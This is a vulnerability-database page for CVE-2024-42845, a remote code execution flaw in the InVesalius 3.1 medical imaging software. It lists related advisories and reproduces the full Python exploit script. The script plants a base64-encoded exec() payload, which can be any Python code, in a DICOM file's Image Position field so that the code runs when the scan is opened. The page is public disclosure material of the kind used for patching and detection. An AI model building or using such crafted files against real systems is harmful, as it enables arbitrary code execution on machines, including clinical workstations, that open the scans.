Invesalius 3.1 Remote Code Execution

🗓️ 26 Aug 2024 00:00:00Reported by Riccardo Degli Esposti, Alessio RomanoType

packetstorm🔗 packetstormsecurity.com👁 393 Views

Invesalius 3.1 Remote Code Execution CVE-2024-4284

Reporter	Title	Published	Views	Family All 19
0day.today	Invesalius 3.1 Remote Code Execution Exploit	28 Aug 202400:00	–	zdt
GithubExploit	Exploit for CVE-2024-42845	23 Aug 202413:43	–	githubexploit
GithubExploit	Exploit for CVE-2024-42845	10 Jan 202520:00	–	githubexploit
BDU FSTEC	The vulnerability of the invesalius/reader/dicom.py component of the medical software used to create virtual reconstructions of human structures, InVesalius, allows a perpetrator to execute arbitrary code.	27 Sep 202400:00	–	bdu_fstec
Circl	CVE-2024-42845	23 Aug 202421:19	–	circl
CNNVD	InVesalius 安全漏洞	23 Aug 202400:00	–	cnnvd
CVE	CVE-2024-42845	23 Aug 202400:00	–	cve
Cvelist	CVE-2024-42845	23 Aug 202400:00	–	cvelist
Debian CVE	CVE-2024-42845	23 Aug 202400:00	–	debiancve
Exploit DB	Invesalius3 - Remote Code Execution	28 Aug 202400:00	–	exploitdb

`# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE)  
# Discovered By: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)  
# Exploit Author: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)  
# Vendor Homepage: https://invesalius.github.io/  
# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius  
# Version: 3.1.99991 to 3.1.99998  
# Tested on: Windows  
# CVE-ID: CVE-2024-42845  
# External references: https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan, https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845  
  
###  
# exploit to create the malicious DICOM file  
###  
  
import pydicom  
import base64  
import argparse  
  
pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE  
  
  
def encode_payload(plain_payload):  
data = open(plain_payload, 'rb').read()  
return f"exec(__import__('base64').b64decode({base64.b64encode(data)})"  
  
def prepare_dicom_payload(dicom_file_path, sign, payload):  
try:  
dicom_data = pydicom.dcmread(dicom_file_path)  
if sign:  
dicom_data.Manufacturer = "Malicious DICOM file creator"  
dicom_data.InstitutionName = "Malicious DICOM file institution"  
  
values = dicom_data[0x0020, 0x0032].value  
mal = [str(i) for i in values]  
mal.append(encode_payload(payload))  
  
except pydicom.errors.InvalidDicomError:  
print("The file is not a valid DICOM file.")  
except Exception as e:  
print(f"An error occurred: {e}")  
  
return mal  
  
  
def modify_dicom_field(dicom_file_path, malicious_tag, outfile):  
try:  
dicom_dataset = pydicom.dcmread(dicom_file_path)  
elem = pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag)  
dicom_dataset[0x00200032] = elem  
print(dicom_dataset)  
dicom_dataset.save_as(outfile)  
except Exception as e:  
print(f"An error occurred: {e}")  
  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser(description='Read a DICOM file.')  
parser.add_argument('--dicom', required=True, help='Path to the input DICOM file')  
parser.add_argument('--outfile', required=True, help='Path to the output DICOM file')  
parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code')  
parser.add_argument('--signature', required=False, default=True)  
  
args = parser.parse_args()  
dicom_infile_path = args.dicom  
dicom_outfile_path = args.outfile  
  
tmp_tag = prepare_dicom_payload(dicom_infile_path, sign=args.signature, payload=args.payload)  
if tmp_tag:  
malicious_tag = '\\'.join(tmp_tag)  
  
modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path)  
exit(0)  
else:  
exit(1)  
`

26 Aug 2024 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.02655